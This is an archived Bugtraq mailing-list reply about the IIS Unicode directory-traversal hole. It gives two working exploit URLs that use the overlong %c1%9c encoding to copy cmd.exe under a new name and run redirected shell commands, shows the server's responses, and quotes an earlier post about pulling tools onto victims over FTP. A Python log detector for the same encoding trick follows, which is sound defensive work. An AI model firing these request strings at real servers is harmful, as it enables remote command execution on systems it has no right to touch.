Bugtraq mailing list archives
Re: IIS Unicode
From: Nsfocus Security Team <security () NSFOCUS COM>
Date: Wed, 25 Oct 2000 16:12:13 +0800
If we copy and rename "cmd.exe" to another filename, the limit can be bypassed.

(1) copy "..\..\winnt\system32\cmd.exe" to "..\..\inetpub\scripts\cmd1.exe"

http://site/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+copy+..\..\winnt\system32\cmd.exe+cmd1.exe

IIS returned:

"CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
1 file(s) copied."

(2) run "cmd1.exe /c echo abc >aaa & dir & type aaa"

http://site/scripts/..%c1%9c../inetpub/scripts/cmd1.exe?/c+echo+abc+>aaa&dir&type+aaa

IIS returned:

" Directory of c:\inetpub\scripts

10/25/2000  03:48p      <DIR>          .
10/25/2000  03:48p      <DIR>          ..
10/25/2000  03:51p                   6 aaa
12/07/1999  05:00a             236,304 cmd1.exe
..
abc "

---Original Message---
Bugtraq ID 1806, http://www.securityfocus.com/vdb/bottom.html?vid=1806 applies:

I was having problems executing a command that contains a redirect (>) using any of the IIS Unicode exploits (including my own exploits on SecurityFocus ;) ). If anyone can get a redirect working, please let me know.

In order to get some interesting tools on the victim, you would probably want the victim to FTP to the attacker. The problem without a redirect is that you cannot build the FTP command file, and you are a bit stuck.
[snip]
------------------------------------------------------
Roelof W Temmingh
SensePost IT security

Regards,
Nsfocus Security Team <security () nsfocus com>
http://www.nsfocus.com
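A detector for the encoding trick both URLs above rely on, added here as an example and not part of the Bugtraq post: it percent-decodes the request path, folds overlong two-byte UTF-8 (%c1%9c, %c0%af) to the separator the vulnerable decoder produced, and flags the traversal independently of the executable's name, so the rename in step (1) does not evade it. The log lines are constructed, in the IIS W3C field order assumed here (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status).

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed IIS-style log lines; the first two mirror the requests quoted
# in the post, the third is benign traffic for contrast.
SAMPLE_LOG = r"""
2000-10-25 03:48:00 10.0.0.5 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+copy+..\..\winnt\system32\cmd.exe+cmd1.exe 502
2000-10-25 03:51:00 10.0.0.5 GET /scripts/..%c1%9c../inetpub/scripts/cmd1.exe /c+echo+abc+>aaa&dir&type+aaa 200
2000-10-25 03:52:00 10.0.0.9 GET /index.html - 200
""".strip().splitlines()

def decode_overlong(raw):
    """Turn percent-decoded bytes into text, folding overlong 2-byte UTF-8
    (lead byte 0xC0/0xC1, never valid) to the ASCII char it encodes, as the
    vulnerable decoder did. Returns (text, saw_overlong)."""
    out, i, overlong = [], 0, False
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            overlong, i = True, i + 2
        else:
            out.append(chr(b) if b < 0x80 else "?")
            i += 1
    return "".join(out), overlong

def classify(line):
    """Findings for one log line; keys on the encoding and the traversal,
    not on the executable's name, so a renamed cmd1.exe is still caught."""
    parts = line.split()
    if len(parts) < 7:
        return set()
    stem, query = parts[4], parts[5]
    path, overlong = decode_overlong(unquote_to_bytes(stem))
    findings = set()
    if overlong:
        findings.add("overlong-utf8")
    if re.search(r"\.\.[\\/]", path):          # '..' plus either separator
        findings.add("traversal")
    if re.search(r"(?i)[\\/][^\\/]+\.exe$", path) and query != "-":
        findings.add("exe-with-args")
    return findings

def scan(lines):
    """Return [(client_ip, decoded_path, findings)] for lines with findings."""
    hits = []
    for line in lines:
        f = classify(line)
        if f:
            parts = line.split()
            hits.append((parts[2], decode_overlong(unquote_to_bytes(parts[4]))[0], f))
    return hits

if __name__ == "__main__":
    for ip, path, f in scan(SAMPLE_LOG):
        print(ip, path, sorted(f))
```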